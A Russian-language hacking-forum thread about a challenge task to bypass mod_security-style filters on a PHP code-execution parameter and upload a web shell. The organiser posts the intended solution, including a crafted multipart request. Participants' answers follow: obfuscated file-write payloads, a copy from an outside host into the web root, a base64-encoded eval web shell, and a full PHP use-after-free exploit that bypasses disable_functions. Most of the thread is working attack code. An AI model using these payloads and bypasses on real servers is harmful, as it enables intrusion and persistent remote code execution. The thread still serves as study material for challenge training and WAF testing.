Task # Task #12

Тот_самый_Щуп · 2 Sep 2020

Задача: есть параметр уязвимый к RCE, но провести полноценную атаку мешают фильтры, которые сводят угрозу выполнения произвольного кода к минимуму.
На сайте есть врайтабельная папка. Вам предлагается обойти фильтры, выполнить произвольный PHP код и залить "шелла" в эту самую врайтабельную папку.

Таск основан на реальных фильтрах mod_security, с некоторыми авторскими модификациями

Решением будет считаться код, с помощью которого можно будет залить "шелла" во врайтабельную папку.
Отдельно выполненные команды типа phpinfo() - не считаются.
Брутить и сканить ничего не нужно.
Сложность и креативность решения будет оцениваться отдельно. Данный таск можно пройти разными вариантами исполнения.

Срок:
две недели.

Таргет:
http://task12.antichat.xyz

Правила остаются прежними:
В теме не флудим, подсказки разрешены только от ТС.

Прошли:
crlf
neur0funk
Baskin-Robbins
Shubka75
Раrаdох
Hulkus
MichelleBoxing
joelblack
ckpunmkug
Harakternik
look2009
fandor9

Тот_самый_Щуп · 2 Sep 2020

Первый прошедший уже есть!

crlf · 2 Sep 2020

Изи таск

neur0funk · 2 Sep 2020

done

dooble · 3 Sep 2020

Как справедливо заметил Crlf, это изи-таск.
Но у задания хороший потенциал:

во-первых, RCE - всегда интересно, а обход фильтров - классика жанра
во-вторых, автор таска моделирует реальный случай, но оставил больше вариантов решения, чем имел сам.
в-третьих, решений много, в т.ч. есть и интересные.
в-четвертых, даже самое простое решение требует твоего включения и "повтыкать", скушно не будет.

Обращаюсь к паблику: Crlf`ами не рождаются, ими становятся. Вот Вам первая ступенька - CRLF[Level1].
И хорошая возможность - шагнуть на эту ступеньку.

А для Крлфов высокого уровня тоже есть варианты, возможно мы их увидим.
Как показывает практика, все мы сначала ищем простые решения, но для спеца 80-го уровня они начинаются не с первого, а примерно с 75 - 76, поэтому ждем их тоже.

Shubka75 · 3 Sep 2020

Прошел таск

Раrаdох · 3 Sep 2020

Спасибо за задачу! Выбранное мной решение оказалось не сложным.

Hulkus · 4 Sep 2020

Прошел)

joelblack · 4 Sep 2020

Спасибо за таск

ckpunmkug · 4 Sep 2020

Прошел. Отличный таск. Спасибо.

MichelleBoxing · 5 Sep 2020

Спасибо за таск

Harakternik · 6 Sep 2020

Прошел за 2.5 часа.
Спасибо за task.

look2009 · 10 Sep 2020

Готово. Спасибо.

fandor9 · 14 Sep 2020

Шел залил. Спасибо за задачу!

Тот_самый_Щуп · 16 Sep 2020

Если кому нужно дополнительное время, пишите в ЛС. Таск скоро закрывается

Тот_самый_Щуп · 18 Sep 2020

Таск закрыт. Решения участников будут чуть позже.

Тот_самый_Щуп · 19 Sep 2020

За идею для таска была взята основа конфигурации mod_security с одного ресурса.
Конфигурацию перенесли в виде регулярок на PHP, но кое что было не учтено, что в свою очередь привело к большому количеству всевозможных решений ))

Изначально решение таска планировалось таким.
Заблокированы практически все функции, которые необходимы для заливки шелла, или полноценного выполнения кода, поэтому пришлось бы поискать, что не заблокировано.
mod_security в нашем случае не блокировал callback функции filter_
Одной из таких функций мы можем воспользоваться для чтения файлов, и прочитаем сами себя:
filter_var("index.php", FILTER_CALLBACK,array("options"=>"readfile"));
Получаем исходный код самого скрипта, смотрим его, и видим кривую регулярку:
Code:
$vuln_entry = preg_replace('/(assert|include|eval|require)/is','',$vuln_entry);
Обращаем внимание, что функции assert,eval находятся в запрещенном списке $disable_function_names, но остальные две, include и require - нет.
По сути использовать include или require мешает эта регулярка, но она легко обходится, например так: inclincludeude
Теперь, когда мы можем использовать include, надо подумать, как через неё проэксплуатировать полноценный RCE код.
Врапперы в PHP для include\require по умолчанию отключены, поэтому остается вариант загрузить файл на сервер, и его проинклудить.
Это можно сделать через трюк с загрузкой файла, и пока он находится во временной папке /tmp/ то проинклудить его через scandir подобрав массив.
Выглядит это следующим образом:
Code:
include('/tmp/'.scandir('/tmp/')[6]);
Соответственно формируем специальный http заголовок, и посылаем это на сервер:
Code:
POST / HTTP/1.1
Host: task12.antichat.xyz
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:53.0) Gecko/20170101 Firefox/53.0
Content-Type: multipart/form-data; boundary=---------------------------cd34e5c25fdd9f588c11127a23284
Content-Length: 403
 
-----------------------------cd34e5c25fdd9f588c11127a23284
Content-Disposition: form-data; name="x"; filename="1.jpg"
Content-Type: image/jpeg
 
<?php die('included_546556'); ?>
-----------------------------cd34e5c25fdd9f588c11127a23284
Content-Disposition: form-data; name="rce"
 
$b=inclincludeude('/tmp/'.scandir('/tmp/')[6]);die();
-----------------------------cd34e5c25fdd9f588c11127a23284--
И уже имеем полноценный RCE который ничем не блокируется.

Как я уже писал ранее, из за небольшого косяка с переносом правил mod_security на площадку таска, его можно зарешать и множеством других вариантов.

Сами решения участников:
crlf said:

rce=file_put_contents/**/('I62oGbVMH57C25ASBVdk/ololo','');print_r/**/(scandir/**/('I62oGbVMH57C25ASBVdk'));

Click to expand...

neur0funk said: ↑

$i=scandir('./');foreach($i as $a){print($a.PHP_EOL);};
папка -> I62oGbVMH57C25ASBVdk
copy('http://img.com/static/img/img-logo.png', './I62oGbVMH57C25ASBVdk/logo.png');
шелл неоткуда было тянуть, а белый домен не хотелось плить

Click to expand...

Baskin-Robbins said: ↑

Ищем папку:
$f1="\163\143\141\156\144\151\162"("/var/www/html/");"\160\162\151\156\164\137\162"($f1);
$f1="\163\143\141\156\144\151\162"("/var/www/html/I62oGbVMH57C25ASBVdk/");"\160\162\151\156\164\137\162"($f1);

Заливаемся:
"\143\157\160\171\137\162"("http://afgsdagdfhghgjgfj.coolpage.biz/sdghdshdhdjh.txt","/var/www/html/I62oGbVMH57C25ASBVdk/sdghdshdhdjh.php");
#2
ну например так можно еще
$dirs = dir("/var/www/html");while (false !== ($wrdirs = $dirs->read())) { echo $wrdirs."\n"; };

copy("http://localhost.com/index.html","/var/www/html/shell_12");
#3
и вот так можно
$fro = array('file_get_contents','ololo');$fiii = $fro[0]("http://localhost.com/index.html");$fredd = array('file_put_contents','ololo');$fredd[0]("/var/www/html/shell_12",$fiii);
#4
$pro1 = 'copy';
$ex = explode(" ",$pro1);
implode(" ",$ex)("http://localhost.com/index.html","/var/www/html/shell_12");

Click to expand...

Baskin-Robbins said: ↑

кароч лови, чисто по фану, вариант с байпасом твоего фильтра и system в disable_functions

pwn("ls");
function pwn($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace1 = 'debug_backtrace';
$backtrace2 = explode(" ",$backtrace1);
$backtrace = implode(" ",$backtrace2)();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for ($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$chr1 = 'chr';
$chr2 = explode(" ",$chr1);
$out .= implode(" ",$chr2)($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for ($i = 0; $i < $n; $i++) {
$chr1 = 'chr';
$chr2 = explode(" ",$chr1);
$str[$p + $i] = implode(" ",$chr2)($v & 0xff);
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for ($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if ($p_type == 1 && $p_flags == 6) {
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if ($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}
if (!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for ($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if ($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if ($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if ($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if ($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for ($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if ($leak == 0x10102464c457f) {
return $addr;
}
}
}
function get_sdystem($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if ($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while ($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
$n_alloc = 10;
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle(str_repeat('A', 79));
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if (strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
write($abc, 0x60, 2);
write($abc, 0x70, 6);
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if (!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if (!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if (!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if (!($zif_system = get_sdystem($basic_funcs))) {
die("Couldn't get zif_system address");
}
$fake_obj_offset = 0xd0;
for ($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);
($helper->b)($cmd);
exit();
}

pwn("ls"); function pwn($cmd) { global $abc, $helper, $backtrace; class Vuln { public $a; public function __destruct() { global $backtrace;unset($this->a); $backtrace = (new Exception)->getTrace();if(!isset($backtrace[1]['args'])) {$backtrace1 = 'debug_backtrace';$backtrace2 = explode(" ",$backtrace1);$backtrace = implode(" ",$backtrace2)();}}}class Helper {public $a, $b, $c, $d;}function str2ptr(&$str, $p = 0, $s = 8) {$address = 0;for ($j = $s-1; $j >= 0; $j--) {$address <<= 8;$address |= ord($str[$p+$j]);}return $address;}function ptr2str($ptr, $m = 8) {$out = "";for ($i=0; $i < $m; $i++) {$chr1 = 'chr';$chr2 = explode(" ",$chr1);$out .= implode(" ",$chr2)($ptr & 0xff);$ptr >>= 8;}return $out;}function write(&$str, $p, $v, $n = 8) {$i = 0;for ($i = 0; $i < $n; $i++) {$chr1 = 'chr';$chr2 = explode(" ",$chr1);$str[$p + $i] = implode(" ",$chr2)($v & 0xff);$v >>= 8;}}function leak($addr, $p = 0, $s = 8) {global $abc, $helper;write($abc, 0x68, $addr + $p - 0x10);$leak = strlen($helper->a);if($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type = leak($base, 0x10, 2);$e_phoff = leak($base, 0x20);$e_phentsize = leak($base, 0x36, 2);$e_phnum = leak($base, 0x38, 2);for ($i = 0; $i < $e_phnum; $i++) {$header = $base + $e_phoff + $i * $e_phentsize;$p_type = leak($header, 0, 4);$p_flags = leak($header, 4, 4);$p_vaddr = leak($header, 0x10);$p_memsz = leak($header, 0x28);if ($p_type == 1 && $p_flags == 6) { $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;$data_size = $p_memsz;} else if ($p_type == 1 && $p_flags == 5) { $text_size = $p_memsz;}}if (!$data_addr || !$text_size || !$data_size)return false;return [$data_addr, $text_size, $data_size];}function get_basic_funcs($base, $elf) {list($data_addr, $text_size, $data_size) = $elf;for ($i = 0; $i < $data_size / 8; $i++) {$leak = leak($data_addr, $i * 8);if ($leak - $base > 0 && $leak - $base < $data_addr - $base) {$deref = leak($leak);if ($deref != 0x746e6174736e6f63)continue;} else continue;$leak = leak($data_addr, ($i + 4) * 8);if ($leak - $base > 0 && $leak - $base < $data_addr - $base) {$deref = leak($leak);if ($deref != 0x786568326e6962)continue;} else continue;return $data_addr + $i * 8;}}function get_binary_base($binary_leak) {$base = 0;$start = $binary_leak & 0xfffffffffffff000;for ($i = 0; $i < 0x1000; $i++) {$addr = $start - 0x1000 * $i;$leak = leak($addr, 0, 7);if ($leak == 0x10102464c457f) { return $addr;}}}function get_sdystem($basic_funcs) {$addr = $basic_funcs;do {$f_entry = leak($addr);$f_name = leak($f_entry, 0, 6);if ($f_name == 0x6d6574737973) { return leak($addr + 8);}$addr += 0x20;} while ($f_entry != 0);return false;}function trigger_uaf($arg) {$arg = str_shuffle(str_repeat('A', 79));$vuln = new Vuln();$vuln->a = $arg;}$n_alloc = 10; $contiguous = [];for ($i = 0; $i < $n_alloc; $i++)$contiguous[] = str_shuffle(str_repeat('A', 79));trigger_uaf('x');$abc = $backtrace[1]['args'][0]; $helper = new Helper;$helper->b = function ($x) { };if (strlen($abc) == 79 || strlen($abc) == 0) {die("UAF failed");}$closure_handlers = str2ptr($abc, 0);$php_heap = str2ptr($abc, 0x58);$abc_addr = $php_heap - 0xc8;write($abc, 0x60, 2);write($abc, 0x70, 6);write($abc, 0x10, $abc_addr + 0x60);write($abc, 0x18, 0xa);$closure_obj = str2ptr($abc, 0x20);$binary_leak = leak($closure_handlers, 8);if (!($base = get_binary_base($binary_leak))) {die("Couldn't determine binary base address");}if (!($elf = parse_elf($base))) {die("Couldn't parse ELF header");}if (!($basic_funcs = get_basic_funcs($base, $elf))) {die("Couldn't get basic_functions address");}if (!($zif_system = get_sdystem($basic_funcs))) {die("Couldn't get zif_system address");}$fake_obj_offset = 0xd0;for ($i = 0; $i < 0x110; $i += 8) {write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));}write($abc, 0x20, $abc_addr + $fake_obj_offset);write($abc, 0xd0 + 0x38, 1, 4); write($abc, 0xd0 + 0x68, $zif_system); ($helper->b)($cmd);exit();}

ну сам сплоит ты думаю знаешь

Click to expand...
Shubka75 said: ↑
Привет.
Code:
"\160\162\151\156\164\137\162"(scandir('./')); - находим врайтабельную диру
"\146\151\154\145\137\160\165\164\137\143\157\156\164\145\156\164\163"('./I62oGbVMH57C25ASBVdk/test.txt', 'test'); - и льемся в нее
Click to expand...
Раrаdох said: ↑

Добрый вечер!
Задача решилась вовсе несложно:
Сперва необходимо найти директорию с правами на запись (данный момент зафиксирован в условиях задачи). Делаем это с помощью инъекции следующего кода, который поможет произвести листинг директорий в текущей папке веб-приложения:

PHP:

print_r/**/(scandir('.'));

Можно заметить, что для обхода WAF используется пустой комментарий для раздробления имени функции print_r и списка её аргументов — такой вариант не учитывается. Впрочем, можно было обойтись и обычным echo() который не запрещен, вручную перебрав индексы всех файлов (помимо данного, и этот вариант далеко не последний).
Найдя папку с идентификатором "I62oGbVMH57C25ASBVdk", осталось лишь зашить полезную нагрузку в файл, используя самую очевидную для этого функцию, а также вышеупомянутый метод обхода WAF:

PHP:

file_put_contents/**/("I62oGbVMH57C25ASBVdk/paradox.php", "payload");

Теперь можно эмпирически убедиться, что по адресу /I62oGbVMH57C25ASBVdk/paradox.php располагается рабочая полезная нагрузка.
Задача решена. Если возникнет необходимость в полезную нагрузку запихнуть что-то "запрещенное", — то можно закодировать оную в base64 либо использовать конкатенацию функций chr() / любой иной метод.

Click to expand...

Hulkus said: ↑

Доброй ночи.
В поле input вставил - 0;#?><?php $path=scandir(".");foreach($path as $k){echo $k."<br>";} ?> узнал каталог I62oGbVMH57C25ASBVdk.
Проверил 0;#?><?php $path=scandir("I62oGbVMH57C25ASBVdk");foreach($path as $k){echo $k."<br>";} ?>
Залил шелл 0;#?><?php touch("I62oGbVMH57C25ASBVdk/test33.txt"); ?>

Этого достаточно? В первый раз прохожу.
Спасибо.

дополню.
переводим file_put_contents в oct
выполняем
0;#?><?php "\146\151\154\145\137\160\165\164\137\143\157\156\164\145\156\164\163"("I62oGbVMH57C25ASBVdk/0008.php", "done"); ?>

получаем шелл
http://task.antichat.xyz:10012/I62oGbVMH57C25ASBVdk/0008.php

Click to expand...

MichelleBoxing said: ↑

Привет,
залил файл boxing.txt
Решение
Сначала находим директорию для записи
var_export(scandir('/var/www/html/'));
Смотрим ради интереса исходник index.php
var_export(copy('/var/www/html/index.php','php://output'));
Через эту же функцию copy пишем файл
copy('data://text/plain,supershell_code','/var/www/html/I62oGbVMH57C25ASBVdk/boxing.txt');
Спасибо за интересный таск )

Click to expand...
joelblack said: ↑
Привет)
Code:
rce=chdir('/var/www/html/I62oGbVMH57C25ASBVdk/');$file = new SplFileObject("t4sk_AchAt.php", "w");$file->fputcsv(['<?php phpinfo();?>'],',',' ');print(implode("<br>",scandir( '.')));
Click to expand...
ckpunmkug said: ↑
История прохождения:

В начале я глянул код страницы - ничего полезного, форма как форма.
Потом посмотрел что такое RCE на https://ru.bmstu.wiki/RCE_(Remote_Code_Execution)
И смастерил на локалке стенд
Code:
<?php
if (isset($_POST['rce'])) eval($_POST['rce']);
?>
<html>
    <body>
        <form action='/index.php' method=post>
            Enter value: <input type=text name=rce>
            <input type=submit value="Submit">
        </form>
    </body>
</html>
Прочитал ещё раз условия и загуглил mod_security, оказывается правильно писать слитно.
Нашел и установил к apache2 ModSecurity
Code:
apt-cache search modsecurity
apt install libapache2-mod-security2
Зашел на стенд и понял что нужно исполнить и завершиться
Code:
die('XA!');
Потом подумал что нужно получать результат исполнения
Code:
die(var_export(['XA','Xa','xa','!'], true));
Получаю доступные директории (open_basedir)
Code:
die(phpinfo());
Начинаю сканить директории
Code:
die(var_export(scandir('.'),true));
Code:
array (
  0 => '.',
  1 => '..',
  2 => '.htaccess',
  3 => 'I62oGbVMH57C25ASBVdk',
  4 => 'favicon.ico',
  5 => 'index.php',
)
Хочу узнать что такое I62oGbVMH57C25ASBVdk
Code:
die(var_export(stat('I62oGbVMH57C25ASBVdk'),true));
Code:
array (
  0 => 169,
  1 => 892913827,
  2 => 16895,
  3 => 1,
  4 => 0,
  5 => 0,
  6 => 0,
  7 => 4096,
  8 => 1599199092,
  9 => 1599238668,
  10 => 1599238668,
  11 => 4096,
  12 => 8,
  'dev' => 169,
  'ino' => 892913827,
  'mode' => 16895,
  'nlink' => 1,
  'uid' => 0,
  'gid' => 0,
  'rdev' => 0,
  'size' => 4096,
  'atime' => 1599199092,
  'mtime' => 1599238668,
  'ctime' => 1599238668,
  'blksize' => 4096,
  'blocks' => 8,
)
Преобразую mode и понимаю что можно читать писать и запускать
Code:
<php echo sprintf("%o", 16895); => 40777
Заглядываю в мануал и вижу что это дира
Code:
man 7 inode
S_IFDIR    0040000   directory
Заглядываю внутрь
Code:
die(var_export(scandir('I62oGbVMH57C25ASBVdk'),true));
В одном из файлов нахожу подсказку
Code:
file_put_contents/**/('./I62oGbVMH57C25ASBVdk/baton.txt',urldecode/**/(substr/**/(file_get_contents/**/("php://input"),4)));
Но я хочу ценично залиться, а $_FILES фильтруется. Поэтому я зашел с другой стороны.
Code:
function f($v){return $v['_FILES']['ckpunmkug']['tmp_name'];} die(var_export(copy(f(get_defined_vars()),'./I62oGbVMH57C25ASBVdk/ckpunmkug.php'),true));
Затем создал формочку
Code:
<html>
    <form action='http://task.antichat.xyz:10012/index.php' method='post' enctype='multipart/form-data'>
        <textarea cols='80' rows='5' name='rce' autofocus></textarea><br><br>
        <input type='file' name='ckpunmkug'>
        <input type='submit'>
    </form>
</html>
И залился! Мой файл ckpunmkug.php
Code:
function f($v){return $v['_FILES']['ckpunmkug']['tmp_name'];} die(var_export(copy(f(get_defined_vars()),'./I62oGbVMH57C25ASBVdk/ckpunmkug.php'),true));
Click to expand...
Harakternik said: ↑

Здравствуйте!
Прочитал
https://forum.antichat.ru/threads/478776/
Я прошел, только шелл не выполняется как PHP-скрипт. Так и должно быть?
Надо присылать описание своего прохождения (у меня в текстовом документе) и код, чтобы меня поместили в список в первом посте?
Вот ссылка на них:
https://www.sendspace.com/file/t9ldpb
Пароль на архив WinRAR:
task12
Созданный в папке с правами на запись файл:
http://task.antichat.xyz:10012/I62oGbVMH57C25ASBVdk/Harakternik.php
Спасибо.

Click to expand...

look2009 said: ↑

PHP:

$path = scandir("/var/www/html/");foreach($path as $k){echo $k."<br>";} //смотрим папку $path = scandir("/var/www/html/I62oGbVMH57C25ASBVdk/");foreach($path as $k){echo $k."<br>";} //смотрим подпапку copy('/var/www/html/index.php','/var/www/html/I62oGbVMH57C25ASBVdk/index.txt');// копируем индекс firequirele_purequiret_contenrequirets('/var/www/html/I62oGbVMH57C25ASBVdk/look2009.php', '<?php echo "look2009";?>');// соглано правилам index.php заливаем что хотим

Click to expand...

fandor9 said: ↑

Привет,
шелл залил с помощью:
$ce="PD9waHAgZXZhbCgkX0dFVFtcImNtZFwiXSk7===";$pe="ZmlsZV9wdXRfY29udGVudHM=";$c="base64_decode"($ce);$p="base64_decode"($pe);echo $p;"file_put_contents"("./I62oGbVMH57C25ASBVdk/ololo",$c);

Click to expand...
Решения интересные, многие из которых могут помочь в реальных условиях фильтрации RCE разными WAF системами.
В общем, все молодцы.

Task # Task #12

Тот_самый_Щуп Reservists Of Antichat

Тот_самый_Щуп Reservists Of Antichat

crlf Green member

neur0funk Member

dooble Members of Antichat

Shubka75 Elder - Старейшина

Раrаdох Elder - Старейшина

Hulkus Member

joelblack Reservists Of Antichat

ckpunmkug Member

MichelleBoxing Reservists Of Antichat

Harakternik Member

look2009 Member

fandor9 Reservists Of Antichat

Тот_самый_Щуп Reservists Of Antichat

Тот_самый_Щуп Reservists Of Antichat

Тот_самый_Щуп Reservists Of Antichat

Useful Searches

Task # Task #12

Тот_самый_Щуп Reservists Of Antichat

Тот_самый_Щуп Reservists Of Antichat

crlf Green member

neur0funk Member

dooble Members of Antichat

Shubka75 Elder - Старейшина

Раrаdох Elder - Старейшина

Hulkus Member

joelblack Reservists Of Antichat

ckpunmkug Member

MichelleBoxing Reservists Of Antichat

Harakternik Member

look2009 Member

fandor9 Reservists Of Antichat

Тот_самый_Щуп Reservists Of Antichat

Тот_самый_Щуп Reservists Of Antichat

Тот_самый_Щуп Reservists Of Antichat